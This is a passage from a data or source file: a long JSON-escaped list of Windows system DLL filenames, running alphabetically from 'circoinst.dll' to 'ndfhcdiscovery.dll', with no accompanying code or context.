\"circoinst.dll\", \"ciwmi.dll\", \"clb.dll\", \"clbcatq.dll\", \"cldapi.dll\", \"cleanpccsp.dll\", \"clfsw32.dll\", \"cliconfg.dll\", \"clipboardserver.dll\", \"clipc.dll\", \"clipsvc.dll\", \"clipwinrt.dll\", \"cloudap.dll\", \"cloudidsvc.dll\", \"clrhost.dll\", \"clusapi.dll\", \"cmcfg32.dll\", \"cmdext.dll\", \"cmdial32.dll\", \"cmgrcspps.dll\", \"cmifw.dll\", \"cmintegrator.dll\", \"cmlua.dll\", \"cmpbk32.dll\", \"cmstplua.dll\", \"cmutil.dll\", \"cngcredui.dll\", \"cngprovider.dll\", \"cnvfat.dll\", \"cofiredm.dll\", \"colbact.dll\", \"colorcnv.dll\", \"colorui.dll\", \"combase.dll\", \"comcat.dll\", \"comctl32.dll\", \"comdlg32.dll\", \"coml2.dll\", \"comppkgsup.dll\", \"compstui.dll\", \"computecore.dll\", \"computenetwork.dll\", \"computestorage.dll\", \"comrepl.dll\", \"comres.dll\", \"comsnap.dll\", \"comsvcs.dll\", \"comuid.dll\", \"configmanager2.dll\", \"conhostv1.dll\", \"connect.dll\", \"consentux.dll\", \"consentuxclient.dll\", \"console.dll\", \"consolelogon.dll\", \"contactapis.dll\", \"container.dll\", \"coredpus.dll\", \"coreglobconfig.dll\", \"coremas.dll\", \"coremessaging.dll\", \"coremmres.dll\", \"coreshell.dll\", \"coreshellapi.dll\", \"coreuicomponents.dll\", \"correngine.dll\", \"courtesyengine.dll\", \"cpfilters.dll\", \"creddialogbroker.dll\", \"credprovhelper.dll\", \"credprovhost.dll\", \"credprovs.dll\", \"credprovslegacy.dll\", \"credssp.dll\", \"credui.dll\", \"crypt32.dll\", \"cryptbase.dll\", \"cryptcatsvc.dll\", \"cryptdlg.dll\", \"cryptdll.dll\", \"cryptext.dll\", \"cryptnet.dll\", \"cryptngc.dll\", \"cryptowinrt.dll\", \"cryptsp.dll\", \"cryptsvc.dll\", \"crypttpmeksvc.dll\", \"cryptui.dll\", \"cryptuiwizard.dll\", \"cryptxml.dll\", \"cscapi.dll\", \"cscdll.dll\", \"cscmig.dll\", \"cscobj.dll\", \"cscsvc.dll\", \"cscui.dll\", \"csplte.dll\", \"cspproxy.dll\", \"csrsrv.dll\", \"cxcredprov.dll\", \"c_g18030.dll\", \"c_gsm7.dll\", \"c_is2022.dll\", \"c_iscii.dll\", \"d2d1.dll\", \"d3d10.dll\", \"d3d10core.dll\", 
\"d3d10level9.dll\", \"d3d10warp.dll\", \"d3d10_1.dll\", \"d3d10_1core.dll\", \"d3d11.dll\", \"d3d11on12.dll\", \"d3d12.dll\", \"d3d12core.dll\", \"d3d8thk.dll\", \"d3d9.dll\", \"d3d9on12.dll\", \"d3dscache.dll\", \"dab.dll\", \"dabapi.dll\", \"daconn.dll\", \"dafbth.dll\", \"dafdnssd.dll\", \"dafescl.dll\", \"dafgip.dll\", \"dafiot.dll\", \"dafipp.dll\", \"dafmcp.dll\", \"dafpos.dll\", \"dafprintprovider.dll\", \"dafupnp.dll\", \"dafwcn.dll\", \"dafwfdprovider.dll\", \"dafwiprov.dll\", \"dafwsd.dll\", \"damediamanager.dll\", \"damm.dll\", \"das.dll\", \"dataclen.dll\", \"datusage.dll\", \"davclnt.dll\", \"davhlpr.dll\", \"davsyncprovider.dll\", \"daxexec.dll\", \"dbgcore.dll\", \"dbgeng.dll\", \"dbghelp.dll\", \"dbgmodel.dll\", \"dbnetlib.dll\", \"dbnmpntw.dll\", \"dciman32.dll\", \"dcntel.dll\", \"dcomp.dll\", \"ddaclsys.dll\", \"ddcclaimsapi.dll\", \"ddds.dll\", \"ddisplay.dll\", \"ddoiproxy.dll\", \"ddores.dll\", \"ddpchunk.dll\", \"ddptrace.dll\", \"ddputils.dll\", \"ddp_ps.dll\", \"ddraw.dll\", \"ddrawex.dll\", \"defragproxy.dll\", \"defragres.dll\", \"defragsvc.dll\", \"deploymentcsps.dll\", \"deskadp.dll\", \"deskmon.dll\", \"desktopshellext.dll\", \"devenum.dll\", \"deviceaccess.dll\", \"devicecenter.dll\", \"devicecredential.dll\", \"devicepairing.dll\", \"deviceuxres.dll\", \"devinv.dll\", \"devmgr.dll\", \"devobj.dll\", \"devpropmgr.dll\", \"devquerybroker.dll\", \"devrtl.dll\", \"dfdts.dll\", \"dfscli.dll\", \"dfshim.dll\", \"dfsshlex.dll\", \"dggpext.dll\", \"dhcpcmonitor.dll\", \"dhcpcore.dll\", \"dhcpcore6.dll\", \"dhcpcsvc.dll\", \"dhcpcsvc6.dll\", \"dhcpsapi.dll\", \"diagcpl.dll\", \"diagnosticlogcsp.dll\", \"diagperf.dll\", \"diagsvc.dll\", \"diagtrack.dll\", \"dialclient.dll\", \"dialserver.dll\", \"dictationmanager.dll\", \"difxapi.dll\", \"dimsjob.dll\", \"dimsroam.dll\", \"dinput.dll\", \"dinput8.dll\", \"direct2ddesktop.dll\", \"directml.dll\", \"discan.dll\", \"dismapi.dll\", \"dispbroker.dll\", \"dispex.dll\", \"display.dll\", 
\"displaymanager.dll\", \"dlnashext.dll\", \"dmappsres.dll\", \"dmcfgutils.dll\", \"dmcmnutils.dll\", \"dmcsps.dll\", \"dmdlgs.dll\", \"dmdskmgr.dll\", \"dmdskres.dll\", \"dmdskres2.dll\", \"dmenrollengine.dll\", \"dmintf.dll\", \"dmiso8601utils.dll\", \"dmloader.dll\", \"dmocx.dll\", \"dmoleaututils.dll\", \"dmpushproxy.dll\", \"dmpushroutercore.dll\", \"dmrcdecoder.dll\", \"dmrserver.dll\", \"dmsynth.dll\", \"dmusic.dll\", \"dmutil.dll\", \"dmvdsitf.dll\", \"dmwappushsvc.dll\", \"dmwmicsp.dll\", \"dmxmlhelputils.dll\", \"dnsapi.dll\", \"dnscmmc.dll\", \"dnsext.dll\", \"dnshc.dll\", \"dnsrslvr.dll\", \"docprop.dll\", \"dolbydecmft.dll\", \"domgmt.dll\", \"dosettings.dll\", \"dosvc.dll\", \"dot3api.dll\", \"dot3cfg.dll\", \"dot3conn.dll\", \"dot3dlg.dll\", \"dot3gpclnt.dll\", \"dot3gpui.dll\", \"dot3hc.dll\", \"dot3mm.dll\", \"dot3msm.dll\", \"dot3svc.dll\", \"dot3ui.dll\", \"dpapi.dll\", \"dpapiprovider.dll\", \"dpapisrv.dll\", \"dpnaddr.dll\", \"dpnathlp.dll\", \"dpnet.dll\", \"dpnhpast.dll\", \"dpnhupnp.dll\", \"dpnlobby.dll\", \"dps.dll\", \"dpx.dll\", \"drprov.dll\", \"drt.dll\", \"drtprov.dll\", \"drttransport.dll\", \"drvsetup.dll\", \"drvstore.dll\", \"dsauth.dll\", \"dsccore.dll\", \"dsccoreconfprov.dll\", \"dsclient.dll\", \"dscproxy.dll\", \"dsctimer.dll\", \"dsdmo.dll\", \"dskquota.dll\", \"dskquoui.dll\", \"dsound.dll\", \"dsparse.dll\", \"dsprop.dll\", \"dsquery.dll\", \"dsreg.dll\", \"dsregtask.dll\", \"dsrole.dll\", \"dssec.dll\", \"dssenh.dll\", \"dssvc.dll\", \"dsui.dll\", \"dsuiext.dll\", \"dswave.dll\", \"dtsh.dll\", \"ducsps.dll\", \"dui70.dll\", \"duser.dll\", \"dusmapi.dll\", \"dusmsvc.dll\", \"dwmapi.dll\", \"dwmcore.dll\", \"dwmghost.dll\", \"dwminit.dll\", \"dwmredir.dll\", \"dwmscene.dll\", \"dwrite.dll\", \"dxcore.dll\", \"dxdiagn.dll\", \"dxgi.dll\", \"dxgwdi.dll\", \"dxilconv.dll\", \"dxmasf.dll\", \"dxp.dll\", \"dxpps.dll\", \"dxptasksync.dll\", \"dxtmsft.dll\", \"dxtrans.dll\", \"dxva2.dll\", \"dynamoapi.dll\", \"eapp3hst.dll\", 
\"eappcfg.dll\", \"eappcfgui.dll\", \"eappgnui.dll\", \"eapphost.dll\", \"eappprxy.dll\", \"eapprovp.dll\", \"eapputil.dll\", \"eapsimextdesktop.dll\", \"eapsvc.dll\", \"eapteapauth.dll\", \"eapteapconfig.dll\", \"eapteapext.dll\", \"easconsent.dll\", \"easwrt.dll\", \"edgeangle.dll\", \"edgecontent.dll\", \"edgehtml.dll\", \"edgeiso.dll\", \"edgemanager.dll\", \"edpauditapi.dll\", \"edpcsp.dll\", \"edptask.dll\", \"edputil.dll\", \"eeprov.dll\", \"eeutil.dll\", \"efsadu.dll\", \"efscore.dll\", \"efsext.dll\", \"efslsaext.dll\", \"efssvc.dll\", \"efsutil.dll\", \"efswrt.dll\", \"ehstorapi.dll\", \"ehstorpwdmgr.dll\", \"ehstorshell.dll\", \"els.dll\", \"elscore.dll\", \"elshyph.dll\", \"elslad.dll\", \"elstrans.dll\", \"emailapis.dll\", \"embeddedmodesvc.dll\", \"emojids.dll\", \"encapi.dll\", \"energy.dll\", \"energyprov.dll\", \"energytask.dll\", \"enrollmentapi.dll\", \"enterpriseapncsp.dll\", \"enterprisecsps.dll\", \"enterpriseetw.dll\", \"eqossnap.dll\", \"errordetails.dll\", \"errordetailscore.dll\", \"es.dll\", \"esclprotocol.dll\", \"esclscan.dll\", \"esclwiadriver.dll\", \"esdsip.dll\", \"esent.dll\", \"esentprf.dll\", \"esevss.dll\", \"eshims.dll\", \"etwrundown.dll\", \"euiccscsp.dll\", \"eventaggregation.dll\", \"eventcls.dll\", \"evr.dll\", \"execmodelclient.dll\", \"execmodelproxy.dll\", \"explorerframe.dll\", \"exsmime.dll\", \"extrasxmlparser.dll\", \"f3ahvoas.dll\", \"facilitator.dll\", \"familysafetyext.dll\", \"faultrep.dll\", \"fcon.dll\", \"fdbth.dll\", \"fdbthproxy.dll\", \"fddevquery.dll\", \"fde.dll\", \"fdeploy.dll\", \"fdphost.dll\", \"fdpnp.dll\", \"fdprint.dll\", \"fdproxy.dll\", \"fdrespub.dll\", \"fdssdp.dll\", \"fdwcn.dll\", \"fdwnet.dll\", \"fdwsd.dll\", \"feclient.dll\", \"ffbroker.dll\", \"fhcat.dll\", \"fhcfg.dll\", \"fhcleanup.dll\", \"fhcpl.dll\", \"fhengine.dll\", \"fhevents.dll\", \"fhshl.dll\", \"fhsrchapi.dll\", \"fhsrchph.dll\", \"fhsvc.dll\", \"fhsvcctl.dll\", \"fhtask.dll\", \"fhuxadapter.dll\", \"fhuxapi.dll\", 
\"fhuxcommon.dll\", \"fhuxgraphics.dll\", \"fhuxpresentation.dll\", \"fidocredprov.dll\", \"filemgmt.dll\", \"filterds.dll\", \"findnetprinters.dll\", \"firewallapi.dll\", \"flightsettings.dll\", \"fltlib.dll\", \"fluencyds.dll\", \"fmapi.dll\", \"fmifs.dll\", \"fms.dll\", \"fntcache.dll\", \"fontext.dll\", \"fontprovider.dll\", \"fontsub.dll\", \"fphc.dll\", \"framedyn.dll\", \"framedynos.dll\", \"frameserver.dll\", \"frprov.dll\", \"fsutilext.dll\", \"fthsvc.dll\", \"fundisc.dll\", \"fveapi.dll\", \"fveapibase.dll\", \"fvecerts.dll\", \"fvecpl.dll\", \"fveskybackup.dll\", \"fveui.dll\", \"fvewiz.dll\", \"fwbase.dll\", \"fwcfg.dll\", \"fwmdmcsp.dll\", \"fwpolicyiomgr.dll\", \"fwpuclnt.dll\", \"fwremotesvr.dll\", \"gameinput.dll\", \"gamemode.dll\", \"gamestreamingext.dll\", \"gameux.dll\", \"gamingtcui.dll\", \"gcdef.dll\", \"gdi32.dll\", \"gdi32full.dll\", \"gdiplus.dll\", \"generaltel.dll\", \"geocommon.dll\", \"geolocation.dll\", \"getuname.dll\", \"glmf32.dll\", \"globinputhost.dll\", \"glu32.dll\", \"gmsaclient.dll\", \"gpapi.dll\", \"gpcsewrappercsp.dll\", \"gpedit.dll\", \"gpprefcl.dll\", \"gpprnext.dll\", \"gpscript.dll\", \"gpsvc.dll\", \"gptext.dll\", \"graphicscapture.dll\", \"graphicsperfsvc.dll\", \"groupinghc.dll\", \"hal.dll\", \"halextpl080.dll\", \"hascsp.dll\", \"hashtagds.dll\", \"hbaapi.dll\", \"hcproviders.dll\", \"hdcphandler.dll\", \"heatcore.dll\", \"helppaneproxy.dll\", \"hgcpl.dll\", \"hhsetup.dll\", \"hid.dll\", \"hidcfu.dll\", \"hidserv.dll\", \"hlink.dll\", \"hmkd.dll\", \"hnetcfg.dll\", \"hnetcfgclient.dll\", \"hnetmon.dll\", \"hologramworld.dll\", \"holoshellruntime.dll\", \"holoshextensions.dll\", \"hotplug.dll\", \"hrtfapo.dll\", \"httpapi.dll\", \"httpprxc.dll\", \"httpprxm.dll\", \"httpprxp.dll\", \"httpsdatasource.dll\", \"htui.dll\", \"hvhostsvc.dll\", \"hvloader.dll\", \"hvsigpext.dll\", \"hvsocket.dll\", \"hydrogen.dll\", \"ia2comproxy.dll\", \"ias.dll\", \"iasacct.dll\", \"iasads.dll\", \"iasdatastore.dll\", \"iashlpr.dll\", 
\"iasmigplugin.dll\", \"iasnap.dll\", \"iaspolcy.dll\", \"iasrad.dll\", \"iasrecst.dll\", \"iassam.dll\", \"iassdo.dll\", \"iassvcs.dll\", \"icfupgd.dll\", \"icm32.dll\", \"icmp.dll\", \"icmui.dll\", \"iconcodecservice.dll\", \"icsigd.dll\", \"icsvc.dll\", \"icsvcext.dll\", \"icu.dll\", \"icuin.dll\", \"icuuc.dll\", \"idctrls.dll\", \"idlisten.dll\", \"idndl.dll\", \"idstore.dll\", \"ieadvpack.dll\", \"ieapfltr.dll\", \"iedkcs32.dll\", \"ieframe.dll\", \"iemigplugin.dll\", \"iepeers.dll\", \"ieproxy.dll\", \"iernonce.dll\", \"iertutil.dll\", \"iesetup.dll\", \"iesysprep.dll\", \"ieui.dll\", \"ifmon.dll\", \"ifsutil.dll\", \"ifsutilx.dll\", \"igddiag.dll\", \"ihds.dll\", \"ikeext.dll\", \"imagehlp.dll\", \"imageres.dll\", \"imagesp1.dll\", \"imapi.dll\", \"imapi2.dll\", \"imapi2fs.dll\", \"imgutil.dll\", \"imm32.dll\", \"implatsetup.dll\", \"indexeddblegacy.dll\", \"inetcomm.dll\", \"inetmib1.dll\", \"inetpp.dll\", \"inetppui.dll\", \"inetres.dll\", \"inked.dll\", \"inkobjcore.dll\", \"inproclogger.dll\", \"input.dll\", \"inputcloudstore.dll\", \"inputcontroller.dll\", \"inputhost.dll\", \"inputservice.dll\", \"inputswitch.dll\", \"inseng.dll\", \"installservice.dll\", \"internetmail.dll\", \"internetmailcsp.dll\", \"invagent.dll\", \"iologmsg.dll\", \"iphlpapi.dll\", \"iphlpsvc.dll\", \"ipnathlp.dll\", \"ipnathlpclient.dll\", \"ippcommon.dll\", \"ippcommonproxy.dll\", \"iprtprio.dll\", \"iprtrmgr.dll\", \"ipsecsnp.dll\", \"ipsecsvc.dll\", \"ipsmsnap.dll\", \"ipxlatcfg.dll\", \"iri.dll\", \"iscsicpl.dll\", \"iscsidsc.dll\", \"iscsied.dll\", \"iscsiexe.dll\", \"iscsilog.dll\", \"iscsium.dll\", \"iscsiwmi.dll\", \"iscsiwmiv2.dll\", \"ism.dll\", \"itircl.dll\", \"itss.dll\", \"iuilp.dll\", \"iumbase.dll\", \"iumcrypt.dll\", \"iumdll.dll\", \"iumsdk.dll\", \"iyuv_32.dll\", \"joinproviderol.dll\", \"joinutil.dll\", \"jpmapcontrol.dll\", \"jpndecoder.dll\", \"jpninputrouter.dll\", \"jpnranker.dll\", \"jpnserviceds.dll\", \"jscript.dll\", \"jscript9.dll\", 
\"jscript9diag.dll\", \"jsproxy.dll\", \"kbd101.dll\", \"kbd101a.dll\", \"kbd101b.dll\", \"kbd101c.dll\", \"kbd103.dll\", \"kbd106.dll\", \"kbd106n.dll\", \"kbda1.dll\", \"kbda2.dll\", \"kbda3.dll\", \"kbdadlm.dll\", \"kbdal.dll\", \"kbdarme.dll\", \"kbdarmph.dll\", \"kbdarmty.dll\", \"kbdarmw.dll\", \"kbdax2.dll\", \"kbdaze.dll\", \"kbdazel.dll\", \"kbdazst.dll\", \"kbdbash.dll\", \"kbdbe.dll\", \"kbdbene.dll\", \"kbdbgph.dll\", \"kbdbgph1.dll\", \"kbdbhc.dll\", \"kbdblr.dll\", \"kbdbr.dll\", \"kbdbu.dll\", \"kbdbug.dll\", \"kbdbulg.dll\", \"kbdca.dll\", \"kbdcan.dll\", \"kbdcher.dll\", \"kbdcherp.dll\", \"kbdcr.dll\", \"kbdcz.dll\", \"kbdcz1.dll\", \"kbdcz2.dll\", \"kbdda.dll\", \"kbddiv1.dll\", \"kbddiv2.dll\", \"kbddv.dll\", \"kbddzo.dll\", \"kbdes.dll\", \"kbdest.dll\", \"kbdfa.dll\", \"kbdfar.dll\", \"kbdfc.dll\", \"kbdfi.dll\", \"kbdfi1.dll\", \"kbdfo.dll\", \"kbdfr.dll\", \"kbdfthrk.dll\", \"kbdgae.dll\", \"kbdgeo.dll\", \"kbdgeoer.dll\", \"kbdgeome.dll\", \"kbdgeooa.dll\", \"kbdgeoqw.dll\", \"kbdgkl.dll\", \"kbdgn.dll\", \"kbdgr.dll\", \"kbdgr1.dll\", \"kbdgrlnd.dll\", \"kbdgthc.dll\", \"kbdhau.dll\", \"kbdhaw.dll\", \"kbdhe.dll\", \"kbdhe220.dll\", \"kbdhe319.dll\", \"kbdheb.dll\", \"kbdhebl3.dll\", \"kbdhela2.dll\", \"kbdhela3.dll\", \"kbdhept.dll\", \"kbdhu.dll\", \"kbdhu1.dll\", \"kbdibm02.dll\", \"kbdibo.dll\", \"kbdic.dll\", \"kbdinasa.dll\", \"kbdinbe1.dll\", \"kbdinbe2.dll\", \"kbdinben.dll\", \"kbdindev.dll\", \"kbdinen.dll\", \"kbdinguj.dll\", \"kbdinhin.dll\", \"kbdinkan.dll\", \"kbdinmal.dll\", \"kbdinmar.dll\", \"kbdinori.dll\", \"kbdinpun.dll\", \"kbdintam.dll\", \"kbdintel.dll\", \"kbdinuk2.dll\", \"kbdir.dll\", \"kbdit.dll\", \"kbdit142.dll\", \"kbdiulat.dll\", \"kbdjav.dll\", \"kbdjpn.dll\", \"kbdkaz.dll\", \"kbdkhmr.dll\", \"kbdkni.dll\", \"kbdkor.dll\", \"kbdkurd.dll\", \"kbdkyr.dll\", \"kbdla.dll\", \"kbdlao.dll\", \"kbdlisub.dll\", \"kbdlisus.dll\", \"kbdlk41a.dll\", \"kbdlt.dll\", \"kbdlt1.dll\", \"kbdlt2.dll\", \"kbdlv.dll\", 
\"kbdlv1.dll\", \"kbdlvst.dll\", \"kbdmac.dll\", \"kbdmacst.dll\", \"kbdmaori.dll\", \"kbdmlt47.dll\", \"kbdmlt48.dll\", \"kbdmon.dll\", \"kbdmonmo.dll\", \"kbdmonst.dll\", \"kbdmyan.dll\", \"kbdne.dll\", \"kbdnec.dll\", \"kbdnec95.dll\", \"kbdnecat.dll\", \"kbdnecnt.dll\", \"kbdnepr.dll\", \"kbdnko.dll\", \"kbdno.dll\", \"kbdno1.dll\", \"kbdnso.dll\", \"kbdntl.dll\", \"kbdogham.dll\", \"kbdolch.dll\", \"kbdoldit.dll\", \"kbdosa.dll\", \"kbdosm.dll\", \"kbdpash.dll\", \"kbdphags.dll\", \"kbdpl.dll\", \"kbdpl1.dll\", \"kbdpo.dll\", \"kbdro.dll\", \"kbdropr.dll\", \"kbdrost.dll\", \"kbdru.dll\", \"kbdru1.dll\", \"kbdrum.dll\", \"kbdsf.dll\", \"kbdsg.dll\", \"kbdsl.dll\", \"kbdsl1.dll\", \"kbdsmsfi.dll\", \"kbdsmsno.dll\", \"kbdsn1.dll\", \"kbdsora.dll\", \"kbdsorex.dll\", \"kbdsors1.dll\", \"kbdsorst.dll\", \"kbdsp.dll\", \"kbdsw.dll\", \"kbdsw09.dll\", \"kbdsyr1.dll\", \"kbdsyr2.dll\", \"kbdtaile.dll\", \"kbdtajik.dll\", \"kbdtam99.dll\", \"kbdtat.dll\", \"kbdth0.dll\", \"kbdth1.dll\", \"kbdth2.dll\", \"kbdth3.dll\", \"kbdtifi.dll\", \"kbdtifi2.dll\", \"kbdtiprc.dll\", \"kbdtiprd.dll\", \"kbdtt102.dll\", \"kbdtuf.dll\", \"kbdtuq.dll\", \"kbdturme.dll\", \"kbdtzm.dll\", \"kbdughr.dll\", \"kbdughr1.dll\", \"kbduk.dll\", \"kbdukx.dll\", \"kbdur.dll\", \"kbdur1.dll\", \"kbdurdu.dll\", \"kbdus.dll\", \"kbdusa.dll\", \"kbdusl.dll\", \"kbdusr.dll\", \"kbdusx.dll\", \"kbduzb.dll\", \"kbdvntc.dll\", \"kbdwol.dll\", \"kbdyak.dll\", \"kbdyba.dll\", \"kbdycc.dll\", \"kbdycl.dll\", \"kd.dll\", \"kdcom.dll\", \"kdcpw.dll\", \"kdhvcom.dll\", \"kdnet.dll\", \"kdnet_uart16550.dll\", \"kdscli.dll\", \"kdstub.dll\", \"kdusb.dll\", \"kd_02_10df.dll\", \"kd_02_10ec.dll\", \"kd_02_1137.dll\", \"kd_02_14e4.dll\", \"kd_02_15b3.dll\", \"kd_02_1969.dll\", \"kd_02_19a2.dll\", \"kd_02_1af4.dll\", \"kd_02_8086.dll\", \"kd_07_1415.dll\", \"kd_0c_8086.dll\", \"kerbclientshared.dll\", \"kerberos.dll\", \"kernel32.dll\", \"kernelbase.dll\", \"keycredmgr.dll\", \"keyiso.dll\", \"keymgr.dll\", 
\"knobscore.dll\", \"knobscsp.dll\", \"ksuser.dll\", \"ktmw32.dll\", \"l2gpstore.dll\", \"l2nacp.dll\", \"l2sechc.dll\", \"laprxy.dll\", \"legacynetux.dll\", \"lfsvc.dll\", \"libcrypto.dll\", \"licensemanager.dll\", \"licensingcsp.dll\", \"licensingdiagspp.dll\", \"licensingwinrt.dll\", \"licmgr10.dll\", \"linkinfo.dll\", \"lltdapi.dll\", \"lltdres.dll\", \"lltdsvc.dll\", \"lmhsvc.dll\", \"loadperf.dll\", \"localsec.dll\", \"localspl.dll\", \"localui.dll\", \"locationapi.dll\", \"lockappbroker.dll\", \"lockcontroller.dll\", \"lockscreendata.dll\", \"loghours.dll\", \"logoncli.dll\", \"logoncontroller.dll\", \"lpasvc.dll\", \"lpk.dll\", \"lsasrv.dll\", \"lscshostpolicy.dll\", \"lsm.dll\", \"lsmproxy.dll\", \"lstelemetry.dll\", \"luainstall.dll\", \"luiapi.dll\", \"lz32.dll\", \"magnification.dll\", \"maintenanceui.dll\", \"manageci.dll\", \"mapconfiguration.dll\", \"mapcontrolcore.dll\", \"mapgeocoder.dll\", \"mapi32.dll\", \"mapistub.dll\", \"maprouter.dll\", \"mapsbtsvc.dll\", \"mapsbtsvcproxy.dll\", \"mapscsp.dll\", \"mapsstore.dll\", \"mapstoasttask.dll\", \"mapsupdatetask.dll\", \"mbaeapi.dll\", \"mbaeapipublic.dll\", \"mbaexmlparser.dll\", \"mbmediamanager.dll\", \"mbsmsapi.dll\", \"mbussdapi.dll\", \"mccsengineshared.dll\", \"mccspal.dll\", \"mciavi32.dll\", \"mcicda.dll\", \"mciqtz32.dll\", \"mciseq.dll\", \"mciwave.dll\", \"mcrecvsrc.dll\", \"mdmcommon.dll\", \"mdmdiagnostics.dll\", \"mdminst.dll\", \"mdmmigrator.dll\", \"mdmregistration.dll\", \"memorydiagnostic.dll\", \"messagingservice.dll\", \"mf.dll\", \"mf3216.dll\", \"mfaacenc.dll\", \"mfasfsrcsnk.dll\", \"mfaudiocnv.dll\", \"mfc42.dll\", \"mfc42u.dll\", \"mfcaptureengine.dll\", \"mfcore.dll\", \"mfcsubs.dll\", \"mfds.dll\", \"mfdvdec.dll\", \"mferror.dll\", \"mfh263enc.dll\", \"mfh264enc.dll\", \"mfksproxy.dll\", \"mfmediaengine.dll\", \"mfmjpegdec.dll\", \"mfmkvsrcsnk.dll\", \"mfmp4srcsnk.dll\", \"mfmpeg2srcsnk.dll\", \"mfnetcore.dll\", \"mfnetsrc.dll\", \"mfperfhelper.dll\", \"mfplat.dll\", 
\"mfplay.dll\", \"mfps.dll\", \"mfreadwrite.dll\", \"mfsensorgroup.dll\", \"mfsrcsnk.dll\", \"mfsvr.dll\", \"mftranscode.dll\", \"mfvdsp.dll\", \"mfvfw.dll\", \"mfwmaaec.dll\", \"mgmtapi.dll\", \"mi.dll\", \"mibincodec.dll\", \"midimap.dll\", \"migisol.dll\", \"miguiresource.dll\", \"mimefilt.dll\", \"mimofcodec.dll\", \"minstoreevents.dll\", \"miracastinputmgr.dll\", \"miracastreceiver.dll\", \"mirrordrvcompat.dll\", \"mispace.dll\", \"mitigationclient.dll\", \"miutils.dll\", \"mlang.dll\", \"mmcbase.dll\", \"mmcndmgr.dll\", \"mmcshext.dll\", \"mmdevapi.dll\", \"mmgaclient.dll\", \"mmgaproxystub.dll\", \"mmres.dll\", \"mobilenetworking.dll\", \"modemui.dll\", \"modernexecserver.dll\", \"moricons.dll\", \"moshost.dll\", \"moshostclient.dll\", \"moshostcore.dll\", \"mosstorage.dll\", \"mp3dmod.dll\", \"mp43decd.dll\", \"mp4sdecd.dll\", \"mpeval.dll\", \"mpg4decd.dll\", \"mpr.dll\", \"mprapi.dll\", \"mprddm.dll\", \"mprdim.dll\", \"mprext.dll\", \"mprmsg.dll\", \"mpssvc.dll\", \"mpunits.dll\", \"mrmcorer.dll\", \"mrmdeploy.dll\", \"mrmindexer.dll\", \"mrt100.dll\", \"mrt_map.dll\", \"msaatext.dll\", \"msac3enc.dll\", \"msacm32.dll\", \"msafd.dll\", \"msajapi.dll\", \"msalacdecoder.dll\", \"msalacencoder.dll\", \"msamrnbdecoder.dll\", \"msamrnbencoder.dll\", \"msamrnbsink.dll\", \"msamrnbsource.dll\", \"msasn1.dll\", \"msauddecmft.dll\", \"msaudite.dll\", \"msauserext.dll\", \"mscandui.dll\", \"mscat32.dll\", \"msclmd.dll\", \"mscms.dll\", \"mscoree.dll\", \"mscorier.dll\", \"mscories.dll\", \"msctf.dll\", \"msctfmonitor.dll\", \"msctfp.dll\", \"msctfui.dll\", \"msctfuimanager.dll\", \"msdadiag.dll\", \"msdart.dll\", \"msdelta.dll\", \"msdmo.dll\", \"msdrm.dll\", \"msdtckrm.dll\", \"msdtclog.dll\", \"msdtcprx.dll\", \"msdtcspoffln.dll\", \"msdtctm.dll\", \"msdtcuiu.dll\", \"msdtcvsp1res.dll\", \"msfeeds.dll\", \"msfeedsbs.dll\", \"msflacdecoder.dll\", \"msflacencoder.dll\", \"msftedit.dll\", \"msheif.dll\", \"mshtml.dll\", \"mshtmldac.dll\", \"mshtmled.dll\", 
\"mshtmler.dll\", \"msi.dll\", \"msicofire.dll\", \"msidcrl40.dll\", \"msident.dll\", \"msidle.dll\", \"msidntld.dll\", \"msieftp.dll\", \"msihnd.dll\", \"msiltcfg.dll\", \"msimg32.dll\", \"msimsg.dll\", \"msimtf.dll\", \"msisip.dll\", \"msiso.dll\", \"msiwer.dll\", \"mskeyprotcli.dll\", \"mskeyprotect.dll\", \"msls31.dll\", \"msmpeg2adec.dll\", \"msmpeg2enc.dll\", \"msmpeg2vdec.dll\", \"msobjs.dll\", \"msoert2.dll\", \"msopusdecoder.dll\", \"mspatcha.dll\", \"mspatchc.dll\", \"msphotography.dll\", \"msports.dll\", \"msprivs.dll\", \"msrahc.dll\", \"msrating.dll\", \"msrawimage.dll\", \"msrdc.dll\", \"msrdpwebaccess.dll\", \"msrle32.dll\", \"msscntrs.dll\", \"mssecuser.dll\", \"mssign32.dll\", \"mssip32.dll\", \"mssitlb.dll\", \"mssph.dll\", \"mssprxy.dll\", \"mssrch.dll\", \"mssvp.dll\", \"mstask.dll\", \"mstextprediction.dll\", \"mstscax.dll\", \"msutb.dll\", \"msv1_0.dll\", \"msvcirt.dll\", \"msvcp110_win.dll\", \"msvcp120_clr0400.dll\", \"msvcp140_clr0400.dll\", \"msvcp60.dll\", \"msvcp_win.dll\", \"msvcr100_clr0400.dll\", \"msvcr120_clr0400.dll\", \"msvcrt.dll\", \"msvfw32.dll\", \"msvidc32.dll\", \"msvidctl.dll\", \"msvideodsp.dll\", \"msvp9dec.dll\", \"msvproc.dll\", \"msvpxenc.dll\", \"mswb7.dll\", \"mswebp.dll\", \"mswmdm.dll\", \"mswsock.dll\", \"msxml3.dll\", \"msxml3r.dll\", \"msxml6.dll\", \"msxml6r.dll\", \"msyuv.dll\", \"mtcmodel.dll\", \"mtf.dll\", \"mtfappserviceds.dll\", \"mtfdecoder.dll\", \"mtffuzzyds.dll\", \"mtfserver.dll\", \"mtfspellcheckds.dll\", \"mtxclu.dll\", \"mtxdm.dll\", \"mtxex.dll\", \"mtxoci.dll\", \"muifontsetup.dll\", \"mycomput.dll\", \"mydocs.dll\", \"napcrypt.dll\", \"napinsp.dll\", \"naturalauth.dll\", \"naturallanguage6.dll\", \"navshutdown.dll\", \"ncaapi.dll\", \"ncasvc.dll\", \"ncbservice.dll\", \"ncdautosetup.dll\", \"ncdprop.dll\", \"nci.dll\", \"ncobjapi.dll\", \"ncrypt.dll\", \"ncryptprov.dll\", \"ncryptsslp.dll\", \"ncsi.dll\", \"ncuprov.dll\", \"nddeapi.dll\", \"ndfapi.dll\", \"ndfetw.dll\", \"ndfhcdiscovery.dll\", 
